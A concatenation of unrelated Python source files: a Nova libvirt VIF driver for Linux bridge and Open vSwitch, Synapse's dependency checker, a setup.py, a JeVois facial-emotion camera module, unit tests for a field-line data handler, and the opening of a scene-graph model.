from nova.virt import netutils
from nova.virt import vif
from nova.virt.libvirt import config
LOG = logging.getLogger(__name__)
libvirt_vif_opts = [
cfg.StrOpt('libvirt_ovs_bridge',
default='br-int',
help='Name of Integration Bridge used by Open vSwitch'),
cfg.BoolOpt('libvirt_use_virtio_for_bridges',
default=False,
help='Use virtio for bridge interfaces'),
]
FLAGS = flags.FLAGS
FLAGS.register_opts(libvirt_vif_opts)
flags.DECLARE('libvirt_type', 'nova.virt.libvirt.driver')
LINUX_DEV_LEN = 14
class LibvirtBridgeDriver(vif.VIFDriver):
"""VIF driver for Linux bridge."""
def _get_configurations(self, instance, network, mapping):
"""Get a dictionary of VIF configurations for bridge type."""
mac_id = mapping['mac'].replace(':', '')
conf = config.LibvirtConfigGuestInterface()
conf.net_type = "bridge"
conf.mac_addr = mapping['mac']
conf.source_dev = network['bridge']
conf.script = ""
if FLAGS.libvirt_use_virtio_for_bridges:
conf.model = "virtio"
conf.filtername = "nova-instance-" + instance['name'] + "-" + mac_id
conf.add_filter_param("IP", mapping['ips'][0]['ip'])
if mapping['dhcp_server']:
conf.add_filter_param("DHCPSERVER", mapping['dhcp_server'])
if FLAGS.use_ipv6:
conf.add_filter_param("RASERVER",
mapping.get('gateway_v6') + "/128")
if FLAGS.allow_same_net_traffic:
net, mask = netutils.get_net_and_mask(network['cidr'])
conf.add_filter_param("PROJNET", net)
conf.add_filter_param("PROJMASK", mask)
if FLAGS.use_ipv6:
net_v6, prefixlen_v6 = netutils.get_net_and_prefixlen(
network['cidr_v6'])
conf.add_filter_param("PROJNET6", net_v6)
conf.add_filter_param("PROJMASK6", prefixlen_v6)
return conf
def plug(self, instance, vif):
"""Ensure that the bridge exists, and add VIF to it."""
network, mapping = vif
if (not network.get('multi_host') and
mapping.get('should_create_bridge')):
if mapping.get('should_create_vlan'):
iface = FLAGS.vlan_interface or network['bridge_interface']
LOG.debug(_('Ensuring vlan %(vlan)s and bridge %(bridge)s'),
{'vlan': network['vlan'],
'bridge': network['bridge']},
instance=instance)
linux_net.LinuxBridgeInterfaceDriver.ensure_vlan_bridge(
network['vlan'],
network['bridge'],
iface)
else:
iface = FLAGS.flat_interface or network['bridge_interface']
LOG.debug(_("Ensuring bridge %s"), network['bridge'],
instance=instance)
linux_net.LinuxBridgeInterfaceDriver.ensure_bridge(
network['bridge'],
iface)
return self._get_configurations(instance, network, mapping)
def unplug(self, instance, vif):
"""No manual unplugging required."""
pass
class LibvirtOpenVswitchDriver(vif.VIFDriver):
"""VIF driver for Open vSwitch that uses libivrt type='ethernet'
Used for libvirt versions that do not support
OVS virtual port XML (0.9.10 or earlier).
"""
def get_dev_name(self, iface_id):
return ("tap" + iface_id)[:LINUX_DEV_LEN]
def create_ovs_vif_port(self, dev, iface_id, mac, instance_id):
utils.execute('ovs-vsctl', '--', '--may-exist', 'add-port',
FLAGS.libvirt_ovs_bridge, dev,
'--', 'set', 'Interface', dev,
'external-ids:iface-id=%s' % iface_id,
'external-ids:iface-status=active',
'external-ids:attached-mac=%s' % mac,
'external-ids:vm-uuid=%s' % instance_id,
run_as_root=True)
def delete_ovs_vif_port(self, dev):
utils.execute('ovs-vsctl', 'del-port', FLAGS.libvirt_ovs_bridge,
dev, run_as_root=True)
utils.execute('ip', 'link', 'delete', dev, run_as_root=True)
def plug(self, instance, vif):
network, mapping = vif
iface_id = mapping['vif_uuid']
dev = self.get_dev_name(iface_id)
if not linux_net._device_exists(dev):
# Older version of the command 'ip' from the iproute2 package
# don't have support for the tuntap option (lp:882568). If it
# turns out we're on an old version we work around this by using
# tunctl.
try:
# First, try with 'ip'
utils.execute('ip', 'tuntap', 'add', dev, 'mode', 'tap',
run_as_root=True)
except exception.ProcessExecutionError:
# Second option: tunctl
utils.execute('tunctl', '-b', '-t', dev, run_as_root=True)
utils.execute('ip', 'link', 'set', dev, 'up', run_as_root=True)
self.create_ovs_vif_port(dev, iface_id, mapping['mac'],
instance['uuid'])
conf = config.LibvirtConfigGuestInterface()
if FLAGS.libvirt_use_virtio_for_bridges:
conf.model = "virtio"
conf.net_type = "ethernet"
conf.target_dev = dev
conf.script = ""
conf.mac_addr = mapping['mac']
return conf
def unplug(self, instance, vif):
"""Unplug the VIF by deleting the port from the bridge."""
try:
network, mapping = vif
self.delete_ovs_vif_port(self.get_dev_name(mapping['vif_uuid']))
except exception.ProcessExecutionError:
LOG.exception(_("Failed while unplugging vif"), instance=instance)
class LibvirtHybridOVSBridgeDriver(LibvirtBridgeDriver,
LibvirtOpenVswitchDriver):
"""VIF driver that uses OVS + Linux Bridge for iptables compatibility.
Enables the use of OVS-based Quantum plugins while at the same
time using iptables-based filtering, which requires that vifs be
plugged into a linux bridge, not OVS. IPtables filtering is useful in
particular for Nova security groups.
"""
def get_br_name(self, iface_id):
return ("qbr" + iface_id)[:LINUX_DEV_LEN]
def get_veth_pair_names(self, iface_id):
return (("qvb%s" % iface_id)[:LINUX_DEV_LEN],
("qvo%s" % iface_id)[:LINUX_DEV_LEN])
def plug(self, instance, vif):
"""Plug using hybrid strategy
Create a per-VIF linux bridge, then link that bridge to the OVS
integration bridge via a veth device, setting up the other end
of the veth device just like a normal OVS port. Then boot the
VIF on the linux bridge using standard libvirt mechanisms
"""
network, mapping = vif
iface_id = mapping['vif_uuid']
br_name = self.get_br_name(iface_id)
v1_name, v2_name = self.get_veth_pair_names(iface_id)
if not linux_net._device_exists(br_name):
utils.execute('brctl', 'addbr', br_name, run_as_root=True)
if not linux_net._device_exists(v2_name):
linux_net._create_veth_pair(v1_name, v2_name)
utils.execute('ip', 'link', 'set', br_name, 'up', run_as_root=True)
utils.execute('brctl', 'addif', br_name, v1_name, run_as_root=True)
self.create_ovs_vif_port(v2_name, iface_id, mapping['mac'],
instance['uuid'])
network['bridge'] = br_name
return self._get_configurations(instance, network, mapping)
def unplug(self, instance, vif):
"""UnPlug using hybrid strategy
Unhook port from OVS, unhook port from bridge, delete
bridge, and delete both veth devices.
"""
try:
network, mapping = vif
iface_id = mapping['vif_uuid']
br_name = self.get_br_name(iface_id)
v1_name, v2_name = self.get_veth_pair_names(iface_id)
utils.execute('brctl', 'delif', br_name, v1_name, run_as_root=True)
utils.execute('ip', 'link', 'set', br_name, 'down',
run_as_root=True)
utils.execute('brctl', 'delbr', br_name, run_as_root=True)
self.delete_ovs_vif_port(v2_name)
except exception.ProcessExecutionError:
LOG.exception(_("Failed while unplugging vif"), instance=instance)
class LibvirtOpenVswitchVirtualPortDriver(vif.VIFDriver):
"""VIF driver for Open vSwitch that uses integrated libvirt
OVS virtual port XML (introduced in libvirt 0.9.11)."""
def plug(self, instance, vif):
""" Pass data required to create OVS virtual port element"""
network, mapping = vif
conf = config.LibvirtConfigGuestInterface()
conf.net_type = "bridge"
conf.source_dev = FLAGS.libvirt_ovs_bridge
conf.mac_addr = mapping['mac']
if FLAGS.libvirt_use_virtio_for_bridges:
conf.model = "virtio"
conf.vporttype = "openvswitch"
conf.add_vport_param("interfaceid", mapping['vif_uuid'])
return conf
def unplug(self, instance, vif):
"""No action needed. Libvirt takes care of cleanup"""
pass
class QuantumLinuxBridgeVIFDriver(vif.VIFDriver):
"""VIF driver for Linux Bridge when running Quantum."""
def get_dev_name(self, iface_id):
return ("tap" + iface_id)[:LINUX_DEV_LEN]
def plug(self, instance, vif):
network, mapping = vif
iface_id = mapping['vif_uuid']
dev = self.get_dev_name(iface_id)
if FLAGS.libvirt_type != 'xen':
linux_net.QuantumLinuxBridgeInterfaceDriver.create_tap_dev(dev)
conf = config.LibvirtConfigGuestInterface()
if FLAGS.libvirt_use_virtio_for_bridges:
conf.model = 'virtio'
conf.net_type = "ethernet"
conf.target_dev = dev
conf.script = ""
conf.mac_addr = mapping['mac']
return conf
def unplug(self, instance, vif):
"""Unplug the VIF by deleting the port from the bridge."""
network, mapping = vif
dev = self.get_dev_name(mapping['vif_uuid'])
try:
utils.execute('ip', 'link', 'delete', dev, run_as_root=True)
except exception.ProcessExecutionError:
LOG.warning(_("Failed while unplugging vif"), instance=instance)
raise
|
py | 7dfa78dadb8b0f15edafd8e04529952fa85ba8a2 | # Copyright 2015, 2016 OpenMarket Ltd
# Copyright 2017 Vector Creations Ltd
# Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from pkg_resources import (
DistributionNotFound,
Requirement,
VersionConflict,
get_provider,
)
logger = logging.getLogger(__name__)
# REQUIREMENTS is a simple list of requirement specifiers[1], and must be
# installed. It is passed to setup() as install_requires in setup.py.
#
# CONDITIONAL_REQUIREMENTS is the optional dependencies, represented as a dict
# of lists. The dict key is the optional dependency name and can be passed to
# pip when installing. The list is a series of requirement specifiers[1] to be
# installed when that optional dependency requirement is specified. It is passed
# to setup() as extras_require in setup.py
#
# [1] https://pip.pypa.io/en/stable/reference/pip_install/#requirement-specifiers.
REQUIREMENTS = [
"jsonschema>=2.5.1",
"frozendict>=1",
"unpaddedbase64>=1.1.0",
"canonicaljson>=1.1.3",
"signedjson>=1.0.0",
"pynacl>=1.2.1",
"idna>=2",
# validating SSL certs for IP addresses requires service_identity 18.1.
"service_identity>=18.1.0",
# our logcontext handling relies on the ability to cancel inlineCallbacks
# (https://twistedmatrix.com/trac/ticket/4632) which landed in Twisted 18.7.
"Twisted>=18.7.0",
"treq>=15.1",
# Twisted has required pyopenssl 16.0 since about Twisted 16.6.
"pyopenssl>=16.0.0",
"pyyaml>=3.11",
"pyasn1>=0.1.9",
"pyasn1-modules>=0.0.7",
"daemonize>=2.3.1",
"bcrypt>=3.1.0",
"pillow>=4.3.0",
"sortedcontainers>=1.4.4",
"psutil>=2.0.0",
"pymacaroons>=0.13.0",
"msgpack>=0.5.0",
"phonenumbers>=8.2.0",
"six>=1.10",
# prometheus_client 0.4.0 changed the format of counter metrics
# (cf https://github.com/matrix-org/synapse/issues/4001)
"prometheus_client>=0.0.18,<0.4.0",
# we use attr.s(slots), which arrived in 16.0.0
# Twisted 18.7.0 requires attrs>=17.4.0
"attrs>=17.4.0",
"netaddr>=0.7.18",
]
CONDITIONAL_REQUIREMENTS = {
"email": ["Jinja2>=2.9", "bleach>=1.4.3"],
"matrix-synapse-ldap3": ["matrix-synapse-ldap3>=0.1"],
# we use execute_batch, which arrived in psycopg 2.7.
"postgres": ["psycopg2>=2.7"],
# ConsentResource uses select_autoescape, which arrived in jinja 2.9
"resources.consent": ["Jinja2>=2.9"],
# ACME support is required to provision TLS certificates from authorities
# that use the protocol, such as Let's Encrypt.
"acme": [
"txacme>=0.9.2",
# txacme depends on eliot. Eliot 1.8.0 is incompatible with
# python 3.5.2, as per https://github.com/itamarst/eliot/issues/418
'eliot<1.8.0;python_version<"3.5.3"',
],
"saml2": ["pysaml2>=4.5.0"],
"systemd": ["systemd-python>=231"],
"url_preview": ["lxml>=3.5.0"],
"test": ["mock>=2.0", "parameterized"],
"sentry": ["sentry-sdk>=0.7.2"],
}
ALL_OPTIONAL_REQUIREMENTS = set()
for name, optional_deps in CONDITIONAL_REQUIREMENTS.items():
# Exclude systemd as it's a system-based requirement.
if name not in ["systemd"]:
ALL_OPTIONAL_REQUIREMENTS = set(optional_deps) | ALL_OPTIONAL_REQUIREMENTS
def list_requirements():
return list(set(REQUIREMENTS) | ALL_OPTIONAL_REQUIREMENTS)
class DependencyException(Exception):
@property
def message(self):
return "\n".join([
"Missing Requirements: %s" % (", ".join(self.dependencies),),
"To install run:",
" pip install --upgrade --force %s" % (" ".join(self.dependencies),),
"",
])
@property
def dependencies(self):
for i in self.args[0]:
yield "'" + i + "'"
def check_requirements(for_feature=None):
deps_needed = []
errors = []
if for_feature:
reqs = CONDITIONAL_REQUIREMENTS[for_feature]
else:
reqs = REQUIREMENTS
for dependency in reqs:
try:
_check_requirement(dependency)
except VersionConflict as e:
deps_needed.append(dependency)
errors.append(
"Needed %s, got %s==%s"
% (dependency, e.dist.project_name, e.dist.version)
)
except DistributionNotFound:
deps_needed.append(dependency)
errors.append("Needed %s but it was not installed" % (dependency,))
if not for_feature:
# Check the optional dependencies are up to date. We allow them to not be
# installed.
OPTS = sum(CONDITIONAL_REQUIREMENTS.values(), [])
for dependency in OPTS:
try:
_check_requirement(dependency)
except VersionConflict as e:
deps_needed.append(dependency)
errors.append(
"Needed optional %s, got %s==%s"
% (dependency, e.dist.project_name, e.dist.version)
)
except DistributionNotFound:
# If it's not found, we don't care
pass
if deps_needed:
for e in errors:
logging.error(e)
raise DependencyException(deps_needed)
def _check_requirement(dependency_string):
"""Parses a dependency string, and checks if the specified requirement is installed
Raises:
VersionConflict if the requirement is installed, but with the wrong version
DistributionNotFound if nothing is found to provide the requirement
"""
req = Requirement.parse(dependency_string)
# first check if the markers specify that this requirement needs installing
if req.marker is not None and not req.marker.evaluate():
# not required for this environment
return
get_provider(req)
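# Illustrative behaviour (not part of the original module): for an installed,
# sufficiently recent Twisted, _check_requirement("Twisted>=18.7.0") returns
# silently; an older install raises VersionConflict and a missing one raises
# DistributionNotFound, which check_requirements() above collects into a
# DependencyException.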
if __name__ == "__main__":
import sys
sys.stdout.writelines(req + "\n" for req in list_requirements())
|
py | 7dfa78e02877b492086b6b9d04491180a1df79ca | from os import path
from setuptools import setup, find_packages
import sys
import versioneer
# NOTE: This file must remain Python 2 compatible for the foreseeable future,
# to ensure that we error out properly for people with outdated setuptools
# and/or pip.
min_version = (3, 6)
if sys.version_info < min_version:
error = """
xview does not support Python {0}.{1}.
Python {2}.{3} and above is required. Check your Python version like so:
python3 --version
This may be due to an out-of-date pip. Make sure you have pip >= 9.0.1.
Upgrade pip like so:
pip install --upgrade pip
""".format(*(sys.version_info[:2] + min_version))
sys.exit(error)
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.rst'), encoding='utf-8') as readme_file:
readme = readme_file.read()
with open(path.join(here, 'requirements.txt')) as requirements_file:
# Parse requirements.txt, ignoring any commented-out lines.
requirements = [line for line in requirements_file.read().splitlines()
if not line.startswith('#')]
setup(
name='xview',
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
description="ISS data visualisation",
long_description=readme,
author="Brookhaven National Laboratory",
author_email='[email protected]',
url='https://github.com/elistavitski/xview',
python_requires='>={}'.format('.'.join(str(n) for n in min_version)),
packages=find_packages(exclude=['docs', 'tests']),
entry_points={
'console_scripts': [
# 'command = some.module:some_function',
],
},
include_package_data=True,
package_data={
'xview': [
'xview/spectra_db/*.json',
'xview/ui/*.ui',
]
},
install_requires=requirements,
license="BSD (3-clause)",
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Natural Language :: English',
'Programming Language :: Python :: 3',
],
)
|
py | 7dfa79e8185e92bcfb63646c1281be51ebdab336 | import libjevois as jevois
import cv2 as cv
import numpy as np
## Detect face emotions and send over serial
#
# Add some description of your module here.
#
# @author pepelepoisson
#
# @videomapping YUYV 320 240 30 YUYV 320 240 30 PapasInventeurs Nunchi
# @email [email protected]
# @address 123 first street, Los Angeles CA 90012, USA
# @copyright Copyright (C) 2018 by pepelepoisson
# @mainurl http://pcube.ca
# @supporturl http://pcube.ca
# @otherurl http://pcube.ca
# @license GPL
# @distribution Unrestricted
# @restrictions None
# @ingroup modules
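# Example serial output (illustrative, values made up): the module emits one
# "> mood: ..." line per frame containing eight class scores (network output
# x 100, rounded to two decimals) in the order of self.classes, e.g.
# "> mood: 7.5 88.2 1.1 0.9 0.8 0.5 0.6 0.4".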
class Nunchi:
# ####################################################################################################
## Constructor
def __init__(self):
self.inpWidth = 64 # Resized image width passed to network
self.inpHeight = 64 # Resized image height passed to network
self.scale = 1.0 # Value scaling factor applied to input pixels
self.mean = [127,127,127] # Mean BGR value subtracted from input image
self.rgb = False # True if model expects RGB inputs, otherwise it expects BGR
# This network takes a while to load from microSD. To avoid timouts at construction,
# we will load it in process() instead.
self.timer = jevois.Timer('Neural emotion', 10, jevois.LOG_DEBUG)
self.frame = 0 # a simple frame counter used to demonstrate sendSerial()
# ####################################################################################################
# ###################################################################################################
## Process function with no USB output
#def processNoUSB(self, inframe):
# jevois.sendSerial("process no usb not implemented");
# jevois.LFATAL("process no usb not implemented")
def processNoUSB(self, inframe):
font = cv.FONT_HERSHEY_PLAIN
siz = 0.8
white = (255, 255, 255)
# Load the network if needed:
if not hasattr(self, 'net'):
backend = cv.dnn.DNN_BACKEND_DEFAULT
target = cv.dnn.DNN_TARGET_CPU
self.classes = [ "neutral", "happiness", "surprise", "sadness", "anger", "disgust",
"fear", "contempt" ]
self.model = 'FER+ ONNX'
self.net = cv.dnn.readNet('/jevois/share/opencv-dnn/classification/emotion_ferplus.onnx', '')
self.net.setPreferableBackend(cv.dnn.DNN_BACKEND_DEFAULT)
self.net.setPreferableTarget(cv.dnn.DNN_TARGET_CPU)
# Get the next frame from the camera sensor:
frame = inframe.getCvBGR()
self.timer.start()
frameHeight = frame.shape[0]
frameWidth = frame.shape[1]
#mid = int((frameWidth - 110) / 2) + 110 # x coord of midpoint of our bars
#leng = frameWidth - mid - 6 # max length of our bars
maxconf = 999
# Create a 4D blob from a frame.
gframe = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)
blob = cv.dnn.blobFromImage(gframe, self.scale, (self.inpWidth, self.inpHeight), self.mean, self.rgb, crop=True)
# Run the model
self.net.setInput(blob)
out = self.net.forward()
# Show the scores for each class:
out = out.flatten()
# Create dark-gray (value 80) image for the bottom panel, 96 pixels tall and show top-1 class:
#msgbox = np.zeros((96, frame.shape[1], 3), dtype = np.uint8) + 80
jevois.sendSerial('> mood: '+str(round(out[0]*100,2)) + ' ' + str(round(out[1]*100,2)) + ' ' +str(round(out[2]*100,2))+' '+str(round(out[3]*100,2)) + ' ' + str(round(out[4]*100,2)) + ' ' +str(round(out[5]*100,2)) + ' ' + str(round(out[6]*100,2)) + ' ' +str(round(out[7]*100,2)));
#jevois.sendSerial("Getting up to this point");
#jevois.LFATAL("process no usb not implemented")
## JeVois noUSB processing function
# ###################################################################################################
## JeVois main processing function
def process(self, inframe, outframe):
font = cv.FONT_HERSHEY_PLAIN
siz = 0.8
white = (255, 255, 255)
# Load the network if needed:
if not hasattr(self, 'net'):
backend = cv.dnn.DNN_BACKEND_DEFAULT
target = cv.dnn.DNN_TARGET_CPU
self.classes = [ "neutral", "happiness", "surprise", "sadness", "anger", "disgust",
"fear", "contempt" ]
self.model = 'FER+ ONNX'
self.net = cv.dnn.readNet('/jevois/share/opencv-dnn/classification/emotion_ferplus.onnx', '')
self.net.setPreferableBackend(cv.dnn.DNN_BACKEND_DEFAULT)
self.net.setPreferableTarget(cv.dnn.DNN_TARGET_CPU)
# Get the next frame from the camera sensor:
frame = inframe.getCvBGR()
self.timer.start()
frameHeight = frame.shape[0]
frameWidth = frame.shape[1]
mid = int((frameWidth - 110) / 2) + 110 # x coord of midpoint of our bars
leng = frameWidth - mid - 6 # max length of our bars
maxconf = 999
# Create a 4D blob from a frame.
gframe = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)
blob = cv.dnn.blobFromImage(gframe, self.scale, (self.inpWidth, self.inpHeight), self.mean, self.rgb, crop=True)
# Run the model
self.net.setInput(blob)
out = self.net.forward()
# Create dark-gray (value 80) image for the bottom panel, 96 pixels tall and show top-1 class:
msgbox = np.zeros((96, frame.shape[1], 3), dtype = np.uint8) + 80
# Show the scores for each class:
out = out.flatten()
for i in range(8):
conf = out[i] * 100
#jevois.sendSerial(self.classes[i] + ':'+ str(conf));
if conf > maxconf: conf = maxconf
if conf < -maxconf: conf = -maxconf
cv.putText(msgbox, self.classes[i] + ':', (3, 11*(i+1)), font, siz, white, 1, cv.LINE_AA)
rlabel = '%+6.1f' % conf
cv.putText(msgbox, rlabel, (76, 11*(i+1)), font, siz, white, 1, cv.LINE_AA)
cv.line(msgbox, (mid, 11*i+6), (mid + int(conf*leng/maxconf), 11*i+6), white, 4)
#jevois.sendSerial(self.classes[i] + ':', (3, 11*(i+1)), font, siz, white, 1, cv.LINE_AA);
jevois.sendSerial('> mood: '+str(round(out[0]*100,2)) + ' ' + str(round(out[1]*100,2)) + ' ' +str(round(out[2]*100,2))+' '+str(round(out[3]*100,2)) + ' ' + str(round(out[4]*100,2)) + ' ' +str(round(out[5]*100,2)) + ' ' + str(round(out[6]*100,2)) + ' ' +str(round(out[7]*100,2)));
# Put efficiency information.
cv.putText(frame, 'JeVois Nunchi - ' + self.model, (3, 15),
cv.FONT_HERSHEY_SIMPLEX, 0.4, (255, 255, 255), 1, cv.LINE_AA)
t, _ = self.net.getPerfProfile()
fps = self.timer.stop()
label = fps + ', %dms' % (t * 1000.0 / cv.getTickFrequency())
cv.putText(frame, label, (3, frameHeight-5), cv.FONT_HERSHEY_SIMPLEX, 0.4, (255, 255, 255), 1, cv.LINE_AA)
# Stack bottom panel below main image:
frame = np.vstack((frame, msgbox))
# Send output frame to host:
outframe.sendCv(frame)
# Send a string over serial (e.g., to an Arduino). Remember to tell the JeVois Engine to display those messages,
# as they are turned off by default. For example: 'setpar serout All' in the JeVois console:
#jevois.sendSerial("DONE frame {}".format(self.frame));
#self.frame += 1
## JeVois main processing function
|
py | 7dfa7b7dfeee3699a0b58b927370c0384fc752b4 | # -*- coding: utf-8 -*-
"""
Created on Tue June 22 2021
@author: lordofbejgli
"""
import unittest
import os
import re
import numpy as np
from flap_field_lines.field_line_handler import *
try:
from ..config import data_path
except ImportError:
from ..config_default import data_path
class TestLoadingData(unittest.TestCase):
"""
    This is a series of tests that check the behaviour of FieldLineHandler's
    constructor. The test data is not present in the repo because the test
    files are massive. These tests are skipped if the path given for the test
    data does not exist. To run them, first obtain flux surface files for the
    'EIM' W7X magnetic configuration and adjust the setUp() method to point
    to their location.
"""
#Give flux surface files location here
def setUp(self) -> None:
"""
        Test initiation. Initializes a few parameters of the reading. Lines are
        chosen with a multiple selection, while the toroidal coordinate selection
        is given as a range.
"""
self.lines = (5, 60, 120, 240)
self.tor_range = '0:500:50'
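        # '0:500:50' selects toroidal indices 0, 50, ..., 450 (10 points); together with the 4 chosen lines
        # this matches the (3, 4, 10) shapes asserted in the tests below.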
self.handler = FieldLineHandler(data_path, configuration='EIM')
@unittest.skipIf(not os.path.exists(data_path), "Skip if test data path is nonexistent.")
def test_reading_all_lines(self):
"""
Reading all lines from flux surface file.
"""
self.handler.update_read_parameters(surfaces=30)
self.handler.load_data()
self.assertEqual(self.handler.return_field_lines().shape, (3, 360, 3651))
self.handler.load_data(getB=True)
self.assertEqual(self.handler.return_B().shape, (3, 360, 3651))
self.assertEqual(self.handler.return_gradB(), None)
self.handler.load_data(getGradB=True)
self.assertEqual(self.handler.return_gradB().shape, (3, 360, 3651))
self.assertEqual(self.handler.return_B().shape, (3, 360, 3651))
@unittest.skipIf(not os.path.exists(data_path), "Skip if test data path is nonexistent.")
def test_reading_all_by_using_colon(self):
"""
Testing the use of ':' as a selector.
"""
number_of_surfs = len([name for name in os.listdir(self.handler.path)
if name.count('field_lines_tor_ang') > 0
and re.search(r'_v[0-9].sav', name) is None])
self.handler.update_read_parameters(surfaces=':')
self.assertEqual(number_of_surfs,len(self.handler.surfaces))
self.handler.update_read_parameters(surfaces=30, lines=':', tor_range=':')
self.handler.load_data()
self.assertEqual(self.handler.return_field_lines().shape, (3, 360, 3651))
self.handler.load_data(getB=True)
self.assertEqual(self.handler.return_B().shape, (3, 360, 3651))
self.assertEqual(self.handler.return_gradB(), None)
self.handler.load_data(getGradB=True)
self.assertEqual(self.handler.return_gradB().shape, (3, 360, 3651))
self.assertEqual(self.handler.return_B().shape, (3, 360, 3651))
@unittest.skipIf(not os.path.exists(data_path), "Skip if test data path is nonexistent.")
def test_read_directions(self):
"""
These tests check the reading of field lines in various directions.
"""
self.handler.update_read_parameters(surfaces=30, lines=self.lines,
tor_range=self.tor_range, direction='backward')
self.handler.load_data()
self.assertEqual(self.handler.return_field_lines().shape, (3, 4, 10))
self.handler.update_read_parameters(surfaces=30, lines=self.lines,
tor_range=self.tor_range, direction='both')
self.handler.load_data()
self.assertEqual(self.handler.return_field_lines().shape, (3, 4, 10))
field_lines = self.handler.return_field_lines()
self.handler.update_read_parameters(surfaces=30, lines=self.lines,
tor_range='-1:-500:-50', direction='backward')
self.handler.load_data()
self.assertTrue(np.array_equal(field_lines, self.handler.return_field_lines()))
@unittest.skipIf(not os.path.exists(data_path), "Skip if test data path is nonexistent.")
def test_read_multiple_files(self):
"""
Checks reading from multiple files. Also tests correct behaviour if
some files are not found. Checks if fs_info is properly read.
"""
self.handler.update_read_parameters(surfaces=(30, 40), lines=self.lines,
tor_range=self.tor_range)
self.handler.load_data()
self.assertEqual(self.handler.return_field_lines().shape, (3, 4, 10, 2))
self.handler.update_read_parameters(surfaces=(97, 30, 98), lines=self.lines,
tor_range=self.tor_range)
self.handler.load_data(getB=True)
self.assertEqual(self.handler.return_field_lines().shape, (3, 4, 10))
self.assertEqual(self.handler.return_B().shape, (3, 4, 10))
self.handler.update_read_parameters(surfaces=40, lines=self.lines,
tor_range=self.tor_range, drop_data=False)
self.handler.load_data()
self.assertEqual(self.handler.return_field_lines().shape, (3, 4, 10, 2))
self.assertEqual(self.handler.return_B().shape, (3, 4, 10, 2))
self.handler.update_read_parameters(surfaces="30:41:10", lines=self.lines,
tor_range=self.tor_range)
self.handler.load_data()
self.assertEqual(self.handler.return_field_lines().shape, (3, 4, 10, 2))
self.handler.load_data(getB=True)
self.assertEqual(self.handler.return_field_lines().shape, (3, 4, 10, 2))
self.assertEqual(self.handler.return_B().shape, (3, 4, 10, 2))
self.assertEqual(self.handler.return_gradB(), None)
self.handler.load_data(getGradB=True)
self.assertEqual(self.handler.return_field_lines().shape, (3, 4, 10, 2))
self.assertEqual(self.handler.return_B().shape, (3, 4, 10, 2))
self.assertEqual(self.handler.return_gradB().shape, (3, 4, 10, 2))
fs_info = self.handler.return_fs_info()
self.assertTrue(np.array_equal(fs_info['separatrix'], [83, 43, 55, 65, 76, 87]))
@unittest.skipIf(not os.path.exists(data_path), "Skip if test data path is nonexistent.")
def test_read_B_gradB(self):
"""
Checks reading B and gradB.
"""
self.handler.update_read_parameters(surfaces=(30, 40), lines=self.lines,
tor_range=self.tor_range)
self.handler.load_data(getB=True)
self.assertEqual(self.handler.return_B().shape, (3, 4, 10, 2))
self.handler.update_read_parameters(surfaces=(30, 40), lines=self.lines,
tor_range=self.tor_range)
self.handler.load_data(getGradB=True)
self.assertEqual(self.handler.return_gradB().shape, (3, 4, 10, 2))
self.handler.update_read_parameters(surfaces=(30, 40), lines=self.lines,
tor_range=self.tor_range)
self.handler.load_data(getB=True, getGradB=True)
self.assertEqual(self.handler.return_B().shape, (3, 4, 10, 2))
self.assertEqual(self.handler.return_gradB().shape, (3, 4, 10, 2))
|
py | 7dfa7cfa68d826aa8b9a1c3fa184801fdd079c67 | '''
Created on Aug 9, 2009
@author: aleksandrcicenin
'''
|
py | 7dfa7ecfaa4b68516527d63cd5f2714e10c77668 | """
Let's get the relationships yo
"""
import numpy as np
import torch
import torch.nn as nn
import torch.nn.parallel
from torch.autograd import Variable
from torch.nn import functional as F
from torch.nn.utils.rnn import PackedSequence
#from lib.resnet import resnet_l4
from config import BATCHNORM_MOMENTUM
from lib.fpn.nms.functions.nms import apply_nms
# from lib.decoder_rnn import DecoderRNN, lstm_factory, LockedDropout
from lib.lstm.decoder_rnn import DecoderRNN
#from lib.lstm.decoder_rnn_bg import DecoderRNN
from lib.lstm.highway_lstm_cuda.alternating_highway_lstm import AlternatingHighwayLSTM
from lib.fpn.box_utils import bbox_overlaps, center_size
from lib.get_union_boxes import UnionBoxesAndFeats
from lib.fpn.proposal_assignments.rel_assignments import rel_assignments
from lib.object_detector import ObjectDetector, gather_res, load_vgg, load_resnet
from lib.pytorch_misc import transpose_packed_sequence_inds, to_onehot, arange, enumerate_by_image, diagonal_inds, Flattener
from lib.sparse_targets import FrequencyBias
from lib.surgery import filter_dets
from lib.word_vectors import obj_edge_vectors
from lib.fpn.roi_align.functions.roi_align import RoIAlignFunction
from lib.gcn.pygcn import GraphConvolution
from lib.gcn.pygat import GraphAttentionLayer
from lib.lstm.mu_rnn import MultiLabelRNN
from lib.pytorch_misc import random_choose
import math
from lib.gcn.gat_model import GAT
from lib.sqrtm import sqrtm
def _sort_by_score(im_inds, scores):
"""
We'll sort everything scorewise from Hi->low, BUT we need to keep images together
    and sort the LSTM input from longest to shortest sequence so it can be packed.
:param im_inds: Which im we're on
:param scores: Goodness ranging between [0, 1]. Higher numbers come FIRST
:return: Permutation to put everything in the right order for the LSTM
Inverse permutation
Lengths for the TxB packed sequence.
"""
num_im = im_inds[-1] + 1
rois_per_image = scores.new(num_im)
lengths = []
for i, s, e in enumerate_by_image(im_inds):
rois_per_image[i] = 2 * (s - e) * num_im + i
lengths.append(e - s)
lengths = sorted(lengths, reverse=True)
inds, ls_transposed = transpose_packed_sequence_inds(lengths) # move it to TxB form
inds = torch.LongTensor(inds).cuda(im_inds.get_device())
# ~~~~~~~~~~~~~~~~
# HACKY CODE ALERT!!!
# we're sorting by confidence which is in the range (0,1), but more importantly by longest
# img....
# ~~~~~~~~~~~~~~~~
roi_order = scores - 2 * rois_per_image[im_inds]
_, perm = torch.sort(roi_order, 0, descending=True)
perm = perm[inds]
_, inv_perm = torch.sort(perm)
return perm, inv_perm, ls_transposed
MODES = ('sgdet', 'sgcls', 'predcls', 'predcls_nongtbox', 'detclass')
class LinearizedContext(nn.Module):
"""
Module for computing the object contexts and edge contexts
"""
